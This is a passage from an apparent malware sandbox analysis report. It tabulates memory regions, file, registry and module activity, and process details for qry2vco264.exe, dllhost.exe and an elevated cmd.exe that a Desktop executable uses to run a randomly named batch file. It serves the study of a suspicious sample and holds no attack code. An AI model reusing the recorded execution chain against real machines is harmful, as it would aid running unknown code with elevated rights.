| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00246fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x005f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x00600000 | 0x00633fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00780fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x01b8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001b90000 | 0x01b90000 | 0x01b90fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ba0000 | 0x01ba0000 | 0x01c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fd25000 | 0x7fd25000 | 0x7fd25fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| qry2vco264.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff9000 | 0x7ff5ffff9000 | 0x7ff5ffffafff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffb000 | 0x7ff5ffffb000 | 0x7ff5ffffbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffd000 | 0x7ff5ffffd000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| version.dll | 0x7ffc4b890000 | 0x7ffc4b899fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4fd60000 | 0x7ffc4fe09fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffc54670000 | 0x7ffc54c97fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffc559d0000 | 0x7ffc56ef4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ffc57460000 | 0x7ffc57537fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc578a0000 | 0x7ffc578f0fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (18)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (38)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffc55800000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\qry2vco264.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ffc558202a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ffc558223f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ffc558163c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ffc5581d920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ffc55825620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ffc55825580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ffc558255e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ffc55820e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ffc5581f110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ffc57b8cb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ffc57b95790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ffc57b8ea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ffc558228c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ffc57b8c470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ffc57b95410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ffc57be42f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ffc57bc95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ffc57be3130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ffc55820fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ffc55842720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ffc550fe7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ffc558428e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ffc55816010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ffc55842a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ffc55820310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ffc55842bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ffc558225d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ffc55842cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ffc55816000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ffc550945e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ffc558165a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ffc5581e960 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #137: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #137 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:43, Reason: Child Process |
| Unmonitor | End Time: 00:03:02, Reason: Self Terminated |
| Monitor Duration | 00:00:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb74 |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
F74
0x
454
0x
3C0
0x
FE4
0x
FF8
0x
A38
0x
EF8
0x
C74
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x00000023955b0000 | 0x23955b0000 | 0x23955cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000023955b0000 | 0x23955b0000 | 0x23955bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000023955c0000 | 0x23955c0000 | 0x23955c6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000023955d0000 | 0x23955d0000 | 0x23955e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000023955f0000 | 0x23955f0000 | 0x23956effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000023956f0000 | 0x23956f0000 | 0x23956f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002395700000 | 0x2395700000 | 0x2395701fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x2395710000 | 0x23957cdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000023957d0000 | 0x23957d0000 | 0x23957d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000023957e0000 | 0x23957e0000 | 0x23958dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000023958e0000 | 0x23958e0000 | 0x23959dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000023959e0000 | 0x23959e0000 | 0x2395b8ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x23959e0000 | 0x2395ab5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000023959e0000 | 0x23959e0000 | 0x23959e6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000023959f0000 | 0x23959f0000 | 0x23959f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002395a00000 | 0x2395a00000 | 0x2395afffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x2395b00000 | 0x2395b33fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002395b00000 | 0x2395b00000 | 0x2395b00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002395b10000 | 0x2395b10000 | 0x2395b10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002395b20000 | 0x2395b20000 | 0x2395b3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002395b20000 | 0x2395b20000 | 0x2395b22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002395b30000 | 0x2395b30000 | 0x2395b3ffff | Private Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x2395b40000 | 0x2395b40fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000002395b50000 | 0x2395b50000 | 0x2395b51fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002395b80000 | 0x2395b80000 | 0x2395b8ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x2395b90000 | 0x2395ec6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002395ed0000 | 0x2395ed0000 | 0x2395fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002395fd0000 | 0x2395fd0000 | 0x23960cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000023960d0000 | 0x23960d0000 | 0x23961cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000023961d0000 | 0x23961d0000 | 0x2396357fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002396360000 | 0x2396360000 | 0x23964e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000023964f0000 | 0x23964f0000 | 0x23978effff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000023978f0000 | 0x23978f0000 | 0x23979effff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x23979f0000 | 0x2397b30fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ffd90000 | 0x7df5ffd90000 | 0x7ff5ffd8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7574be000 | 0x7ff7574be000 | 0x7ff7574bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7574c0000 | 0x7ff7574c0000 | 0x7ff7575bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7575c0000 | 0x7ff7575c0000 | 0x7ff7575e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7575e3000 | 0x7ff7575e3000 | 0x7ff7575e4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7575e5000 | 0x7ff7575e5000 | 0x7ff7575e6fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7575e7000 | 0x7ff7575e7000 | 0x7ff7575e7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7575e8000 | 0x7ff7575e8000 | 0x7ff7575e9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7575ea000 | 0x7ff7575ea000 | 0x7ff7575ebfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7575ec000 | 0x7ff7575ec000 | 0x7ff7575edfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7575ee000 | 0x7ff7575ee000 | 0x7ff7575effff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff757890000 | 0x7ff757896fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ffc47230000 | 0x7ffc4727afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4cbd0000 | 0x7ffc4ce43fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #138: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #138 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:45, Reason: Child Process |
| Unmonitor | End Time: 00:03:38, Reason: Self Terminated |
| Monitor Duration | 00:00:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x51c |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AD0
0x
DB8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000db0000 | 0x00db0000 | 0x04daffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04dcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004db0000 | 0x04db0000 | 0x04dbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004dc0000 | 0x04dc0000 | 0x04dc3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04dd1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04dd3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004de0000 | 0x04de0000 | 0x04df3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e40000 | 0x04e40000 | 0x04f3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f40000 | 0x04f40000 | 0x04f43fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004f50000 | 0x04f50000 | 0x04f50fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x04f61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f70000 | 0x04f70000 | 0x04f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x051fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04f80000 | 0x0503dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005040000 | 0x05040000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x050affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x0508ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050a0000 | 0x050a0000 | 0x050affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x051fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005200000 | 0x05200000 | 0x052fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05300000 | 0x05636fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f440000 | 0x7f440000 | 0x7f53ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f540000 | 0x7f540000 | 0x7f562fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f567000 | 0x7f567000 | 0x7f567fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f569000 | 0x7f569000 | 0x7f56bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f56c000 | 0x7f56c000 | 0x7f56efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f56f000 | 0x7f56f000 | 0x7f56ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 64 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 21 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
